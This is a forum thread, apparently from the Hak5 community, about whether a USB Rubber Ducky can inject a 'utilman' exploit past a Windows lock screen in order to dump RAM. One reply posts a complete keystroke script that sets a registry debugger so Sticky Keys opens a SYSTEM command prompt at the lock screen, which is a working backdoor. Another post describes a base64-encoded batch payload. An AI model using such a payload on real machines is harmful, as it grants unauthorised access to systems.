Bits&Bytes Posted June 5, 2013 Share Posted June 5, 2013 (edited) I recently purchased the Rubber Ducky (thanks HAK5, awesome tools thus far). I bought it because. I thought I could bypass the lock screen by injecting my payload (lets say ultiman exploit for ease of use) from the outside looking at a windows lock screen. I routinely find myself in need of capturing a computers RAM (passwords through Rainbow tables....malware discovery....you name it) and cannot if the lock screen is on. For those of you out there who are going to jump on this, yes I could do it through DMA and firewire (IF THEY HAVE FIREWIRE and then I would only get 4 GB of the RAM by DMA design), but I want all the RAM not just what DMA is willing to provide. Basically, I wrote a bat file to conduct the ultiman exploit then encoded it into base64 and placed it in the inject.bin file with a vbs to revert the base64 file back into the .bat file. Then the inject.bin file would execute the .bat file. This works awesome when I plug it in with no lock screen on, however when the lock screen is activated, it never gets to open the command prompt to conduct the injection. HELP HELP HELP I thought because Rubber Ducky would be seen as a HID device it would bypass the lock screen in windows and inject my code. Am I wrong or is this not a capability of the tool? Edited June 5, 2013 by Bits&Bytes Quote Link to comment Share on other sites More sharing options...
Pwnd2Pwnr Posted June 5, 2013 Share Posted June 5, 2013 I do not own a ducky... So, this is to be taken with a grain of salt; but I think if you threw it in at boot... it may take hold. Quote Link to comment Share on other sites More sharing options...
Bits&Bytes Posted June 5, 2013 Author Share Posted June 5, 2013 Actually I need the RAM from the running machine so if I reboot it will preclude the need for the RAM as it will all be cleared in the reboot, but I do thank you for the response. Quote Link to comment Share on other sites More sharing options...
no42 Posted June 5, 2013 Share Posted June 5, 2013 USB does not support DMA (Direct Memory Access) Firewire does have the handy module SBP2 which enables full DMA. You could probably exploit MS13-027, but you would have to program your own payload. Quote Link to comment Share on other sites More sharing options...
crackruckles Posted September 19, 2013 Share Posted September 19, 2013 if you have done my system privileges cmd attack while the machine was unlocked then when it was locked you would have access to a command prompt with system access and im sure you could do something from there. DELAY 400 ESCAPE DELAY 200 CONTROL ESCAPE DELAY 750 STRING cmd.exe /c "reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f" DELAY 750 CTRL-SHIFT ENTER DELAY 1000 ALT y Left Alt + Left Shift + Print Screen to access the prompt. Quote Link to comment Share on other sites More sharing options...
Xcellerator Posted September 19, 2013 Share Posted September 19, 2013 The rubber ducky is just a programmable keyboard device. Anything that you can't do with a keyboard, you can't do with a rubber ducky. So, in order to use the utility manager payload, you need to be at a desktop - not a lock screen or a logos prompt. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.